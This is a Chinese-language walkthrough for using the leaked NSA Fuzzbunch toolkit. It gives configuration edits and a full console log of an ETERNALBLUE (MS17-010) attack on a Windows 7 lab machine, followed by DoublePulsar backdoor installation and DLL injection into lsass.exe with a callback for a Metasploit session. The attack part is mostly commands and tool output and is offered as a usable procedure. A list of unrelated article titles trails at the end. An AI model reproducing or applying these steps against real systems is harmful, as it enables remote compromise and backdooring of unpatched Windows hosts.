0x01 Download NSA工具包

NSA工具包下载

攻击脚本需要32位的Python2.6环境,所以攻击机还需以下两个环境:

python-2.6.6.msi、pywin32-221.win32-py2.6.exe

0x02 修改NSA工具配置文件

  • 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件

注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)

def load_plugins(fb):fb.io.pre_input(None)fb.io.print_msg("Loading Plugins")fb.io.post_input()addplugins(fb, "Exploit",       EXPLOIT_DIR, EDFPlugin)addplugins(fb, "Payload",       PAYLOAD_DIR, EDFPlugin)addplugins(fb, "Touch",         TOUCH_DIR,   EDFPlugin)addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin)#addplugins(fb, "ListeningPost", LP_DIR,      EDFPlugin)addplugins(fb, "Special",       SPECIAL_DIR, DAVEPlugin, DeployableManager)
  • 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\Fuzzbunch.xml文件

修改第19行代码的Resources路径和第24行代码的logs路径,改成目前工具包存放的路径

<t:parameter name="ResourcesDir"description="Absolute path of the Resources Directory"type="String"default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources"/>
<t:parameter name="LogDir"description="Absolute path of an Initial Log Directory"type="String"default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs"/>

0x03 运行fb.py脚本实施ETERNALBLUE攻击

  • 环境说明:
测试机 Windows 7/2008 10.130.3.246
攻击机 Windows 10 10.130.3.243
攻击机 Kali 10.130.3.242
  • 运行fb.py文件实施Eternalblue攻击

运行C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件

Microsoft Windows [版本 10.0.18363.1316]
(c) 2019 Microsoft Corporation。保留所有权利。C:\Users\Administrator\Desktop\shadowbroker-master\windows>python fb.py--[ Version 3.5.1[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs
[*] Autorun ONImplantConfig Autorun List
==========================0) prompt confirm1) executeExploit Autorun List
====================0) apply1) touch all2) prompt confirm3) executeSpecial Autorun List
====================0) apply1) touch all2) prompt confirm3) executePayload Autorun List
====================0) apply1) prompt confirm2) execute[+] Set FbStorage => C:\Users\Administrator\Desktop\shadowbroker-master\windows\storage[*] Retargetting Session[?] Default Target IP Address [] : 10.130.3.246
[?] Default Callback IP Address [] : 10.130.3.242
[?] Use Redirection [yes] : no[?] Base Log directory [C:\Users\Administrator\Desktop\shadowbroker-master... (plus 13 characters)] :
[*] Checking C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs for projects
Index     Project
-----     -------
0         Create a New Project[?] Project [0] :
[?] New Project Name :
[?] Set target log directory to 'C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246'? [Yes] :[*] Initializing Global State
[+] Set TargetIp => 10.130.3.246
[+] Set CallbackIp => 10.130.3.242[!] Redirection OFF
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246Module: Global Variables
========================Name                    Value
----                    -----
ResourcesDir            C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources
Color                   True
ShowHiddenParameters    False
FbStorage               C:\Users\Administrator\Desktop\shadowbroker-master\windows\storage
LogDir                  C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246
TargetIp                10.130.3.246
CallbackIp              10.130.3.242
TmpDir                  C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246
NetworkTimeout          60fb >
fb > use Eternalblue[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.130.3.246[*] Applying Session Parameters
[*] Running Exploit Touches[!] Enter Prompt Mode :: EternalblueModule: Eternalblue
===================Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.130.3.246
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.[?] NetworkTimeout [60] :[*]  TargetIp :: Target IP Address[?] TargetIp [10.130.3.246] :[*]  TargetPort :: Port used by the SMB service for exploit connection[?] TargetPort [445] :[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.[?] VerifyTarget [True] :[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.[?] VerifyBackdoor [True] :[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.[?] MaxExploitAttempts [3] :[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.[?] GroomAllocations [12] :[*]  Target :: Operating System, Service Pack, and Architecture of target OS0) XP            Windows XP 32-Bit All Service Packs*1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs[?] Target [1] :[!] Preparing to Execute Eternalblue[*]  Mode :: Delivery mechanism*0) DANE     Forward deployment via DARINGNEOPHYTE1) FB       Traditional deployment from within FUZZBUNCH[?] Mode [0] : 1
[+] Run Mode: FB[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.130.3.246] :
[?] Destination Port [445] :
[+] (TCP) Local 10.130.3.246:445[+] Configure Plugin Remote TunnelsModule: Eternalblue
===================Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              10.130.3.246
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.[+] Connection established for exploitation.
[*] Pinging backdoor...[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (39 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
0x00000020  50 61 63 6b 20 31 00                             Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming[+] Sending SMBv2 buffers..........DONE.
DONE.[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!DONE.
[*] Receiving response from exploit packet[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...[+] Backdoor NOT installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Trying again with 17 Groom Allocations
[*] Connecting to target for exploitation.[+] Connection established for exploitation.
[*] Pinging backdoor...[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (39 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
0x00000020  50 61 63 6b 20 31 00                             Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming[+] Sending SMBv2 buffers.....DONE.[+] Sending final SMBv2 buffers......DONE.[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!DONE.
[*] Receiving response from exploit packet[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...[+] Backdoor returned code: 10 - Success![+] Ping returned Target architecture: x64 (64-bit)[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeededfb Payload (Doublepulsar) > use Doublepulsar[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.130.3.246[*] Applying Session Parameters[!] Enter Prompt Mode :: DoublepulsarModule: Doublepulsar
====================Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.130.3.246
TargetPort            445
DllPayload            C:\x86.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x64
Function              RunDLL[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.[?] NetworkTimeout [60] :[*]  TargetIp :: Target IP Address[?] TargetIp [10.130.3.246] :[*]  TargetPort :: Port used by the Double Pulsar back door[?] TargetPort [445] :[*]  Protocol :: Protocol for the backdoor to speak*0) SMB     Ring 0 SMB (TCP 445) backdoor1) RDP     Ring 0 RDP (TCP 3389) backdoor[?] Protocol [0] :[*]  Architecture :: Architecture of the target OS0) x86     x86 32-bits*1) x64     x64 64-bits[?] Architecture [1] :[*]  Function :: Operation for backdoor to perform0) OutputInstall     Only output the install shellcode to a binary file on disk.1) Ping              Test for presence of backdoor*2) RunDLL            Use an APC to inject a DLL into a user mode process.3) RunShellcode      Run raw shellcode4) Uninstall         Remove's backdoor from system[?] Function [2] :[*]  DllPayload :: DLL to inject into user mode[?] DllPayload [C:\x86.dll] : C:\\x64.dll
[+] Set DllPayload => C:\\x64.dll[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call[?] DllOrdinal [1] :[*]  ProcessName :: Name of process to inject into[?] ProcessName [lsass.exe] :[*]  ProcessCommandLine :: Command line of process to inject into[?] ProcessCommandLine [] :[!] Preparing to Execute Doublepulsar
[*] Redirection OFF[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.130.3.246] :
[?] Destination Port [445] :
[+] (TCP) Local 10.130.3.246:445[+] Configure Plugin Remote TunnelsModule: Doublepulsar
====================Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.130.3.246
TargetPort            445
DllPayload            C:\x64.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x64
Function              RunDLL[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...[+] Backdoor returned code: 10 - Success![+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x33521E64SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1Target OS is: 7 x64Target SP is: 1[+] Backdoor installed[+] DLL built[.] Sending shellcode to inject DLL[+] Backdoor returned code: 10 - Success![+] Backdoor returned code: 10 - Success![+] Backdoor returned code: 10 - Success![+] Command completed successfully
[+] Doublepulsar Succeeded
  • 需要注意的地方

这里Eternalblue攻击如果失败了可以多试几次

成功之后再使用Doublepulsar

执行攻击

msf的监听别忘了要设置为x64,否则session会die

利用NSA的MS17-010漏洞利用工具攻击Windows7相关推荐

  1. 漏洞利用三:445端口漏洞利用

    445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放. 靶机:win7系统       IP:10.0.0.199           提前关闭靶机防火墙 一.MS17-010    ...

  2. 漏洞利用四:3389端口漏洞利用

    一.MS12-020 1.准备阶段 前提:靶机开放了3389端口,系统没有装补丁. 受影响Windows系统版本: Windows7 Windows Server 2008 R2 Windows Se ...

  3. [译] APT分析报告:08.漏洞利用图谱–通过查找作者的指纹来寻找漏洞

    这是作者新开的一个专栏,主要翻译国外知名安全厂商的APT报告,了解它们的安全技术,学习它们溯源APT组织和恶意代码分析的方法,希望对您有所帮助.当然,由于作者英语有限,会借助机翻进行校验,还请包涵!前 ...

  4. [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  5. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  6. Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限

    Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...

  7. CVE-2022-0185 价值$3w的 File System Context 内核整数溢出漏洞利用分析

    文章目录 1. 漏洞发现 2. 漏洞分析 3. 漏洞利用方法1-任意写篡改 `modprobe_path` 3-1 泄露内核基址 3-2 任意地址写思路 3-3 FUSE 页错误处理 3-4 完整利用 ...

  8. 行走的漏洞利用机器人:僵尸网络病毒携71个EXP占领高地

    前言 僵尸网络 Botnet 是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络. 攻击者通过各种途径传播僵尸程序感染互联 ...

  9. php Wrapper LFI,LFI漏洞利用总结(转载)

    主要涉及到的函数 include(),require().include_once(),require_once() magic_quotes_gpc().allow_url_fopen().allo ...

最新文章

  1. android studio网上订餐软件_直播软件OBS的使用
  2. 传统的6d位姿估计fangfa1_你的厨房被水淹了!别担心,这只是3D深度估计做出的特效...
  3. 手机壁纸图片源码自动采集美图网
  4. 线性分类模型python_python SVM 线性分类模型的实现
  5. DataGrid分页;指定列的总和和平均值;显示鼠标背景色;弹出式窗口;
  6. 《机电传动控制》第三次作业
  7. Node.app让Nodejs平台在iOS和OS X系统上奔跑
  8. C++结构体变量的初始化和结构体char数组成员初始化
  9. PHP 判断操作系统位数
  10. Linux系统管理----centos7系统进程管理
  11. 台式计算机显卡驱动位置,台式电脑独立显卡怎么安装驱动的
  12. 计算机基础知识学习第七课,7、新建文件夹--电脑基础知识
  13. 【压缩感知】Convolutional Neural Networks for Non-iterative Reconstruction of Compressively Sensed Images
  14. JAVA工具类(17)--Java导入导出Excel工具类ExcelUtil
  15. Git提交指定的文件
  16. Android 自定义Switch样式
  17. 【开源物联网】MQTT物联网网关Broker与Java开源实现
  18. swf文件格式1(中文翻译版)
  19. 电脑上媒体服务器在哪个文件夹,老物件之用老PC打造家用媒体服务器
  20. [项目管理]-第六章:工作量估计和进度安排

热门文章

  1. 原生js仿360开机小助手
  2. xcode 使用xparse,xccov解析xcresult文件,查看代码覆盖率,导出日志,提取附件等
  3. suse linux
  4. Consider marking one of the beans as @Primary, updating the consumer to accept multiple beans,报错解决
  5. PTA 7-2 构建下三角矩阵 (15分) 非得用vector
  6. wps word 表格中,每次换行,都会变成另一种字体,无法对其的问题解决。
  7. 二次型对自变量向量的导数
  8. 和sar比起来,其他Linux命令都是猹
  9. go实践二十 web开发--表单唯一token 表单验证 防止xss攻击 上传文件 cookie处理
  10. 搞不定思想和组织转变,何谈企业转型